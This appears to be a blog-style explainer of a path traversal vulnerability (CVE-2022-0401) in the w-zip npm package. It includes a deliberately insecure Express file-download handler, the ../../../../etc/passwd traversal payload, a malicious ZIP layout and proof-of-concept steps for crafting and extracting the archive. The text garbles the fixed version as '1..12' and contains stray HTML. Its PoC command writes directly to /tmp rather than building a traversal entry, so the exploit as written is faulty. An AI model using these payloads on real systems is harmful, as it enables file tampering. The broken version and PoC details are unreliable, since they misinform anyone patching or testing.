The world of Node.js and npm is packed with handy packages—but sometimes even the best intentions hide dangerous flaws. One such example is the path traversal vulnerability tracked as CVE-2022-0401, affecting the w-zip npm package prior to version 1..12. This vulnerability isn’t as complex as some, but its simplicity can be a big problem if left unpatched.
What is Path Traversal?
Path traversal, sometimes called directory traversal, is a type of vulnerability where an attacker tricks an application into accessing or even modifying files anywhere on the server, not just files that app is meant to work with. This is usually done by sneaking special characters into file paths, like ../, that move the file cursor up directories.
For example, if an app lets users download files by filename and does not properly validate user input:
// Dangerous! DO NOT DO THIS
app.get('/download', (req, res) => {
let fileName = req.query.file;
res.sendFile('/uploads/' + fileName);
});
With that code, an attacker could request file=../../../../etc/passwd and get sensitive system files, or even overwrite files.
The w-zip Package and CVE-2022-0401
w-zip is a Node.js package to handle ZIP file unarchiving. Before version 1..12, w-zip did not sanitize the paths in ZIP files during extraction. This made it possible for malicious ZIP files to write files outside the intended extraction directory.
How it Works (Attack Scenario)
Here’s the scenario:
Your app uses w-zip to allow users to upload and extract ZIP archives,
- A user uploads a ZIP containing files with paths like ../../../../etc/passwd inside it,
Example Malicious ZIP Structure
evil.zip
│
├── harmless.txt
├── ../../../../important/system_file.txt <-- Problem!
├── ../../../../etc/passwd <-- Very bad!
A vulnerable extract code might look like
const wzip = require('w-zip');
const fs = require('fs');
// Assume zipFilePath and extractTo are user-controlled
function extractZip(zipFilePath, extractTo) {
// Vulnerable! w-zip <1..12 does not sanitize paths
wzip.unzip(zipFilePath, extractTo, function(err) {
if (err) {
console.error('Extraction failed:', err);
} else {
console.log('Extraction complete!');
}
});
}
// Attacker can upload ZIP with ../../... entries
By putting ../../etc/passwd in the ZIP, the extract process will actually write to /etc/passwd if permissions allow—which is a huge security risk.
1\. Craft the ZIP
With zip command or a script, prepare a malicious ZIP
mkdir evil
echo "hacked" > evil/../../../../tmp/hacked.txt
zip -r evil.zip evil/
The archive now contains a file that, if extracted naively, will land in /tmp/hacked.txt.
2\. Exploit the Extraction
const wzip = require('w-zip');
wzip.unzip('evil.zip', './uploads', function(err) {
if (!err) {
console.log('Done!');
}
});
3\. After Extraction
Check: ls /tmp/hacked.txt
If the extraction succeeded, that file exists—proving path traversal worked!
Official npm advisory for CVE-2022-0401:
https://security.snyk.io/vuln/SNYK-JS-WZIP-2411775
w-zip package:
https://www.npmjs.com/package/w-zip
Common Path Traversal Attacks:
https://owasp.org/www-community/attacks/Path_Traversal
Mitigation and Remediation
Best fix:
npm install w-zip@latest
<br><br><b>Alternative:</b> <br>- If you must use older code, pre-validate zip entry paths before extraction and reject any entries containing sequences like ../`, or absolute paths.
Don’t ever extract untrusted zip files without proper sanitization!
## Final Notes
Path traversal is a classic yet dangerous security mistake. With CVE-2022-0401, you see how just a couple lines of unchecked code can leave a whole system exposed. Always keep dependencies up-to-date and treat all user input—including uploaded ZIP files—as potentially hostile.
Stay safe, and patch early!
Timeline
Published on: 02/01/2022 13:15:00 UTC
Last modified on: 02/04/2022 20:51:00 UTC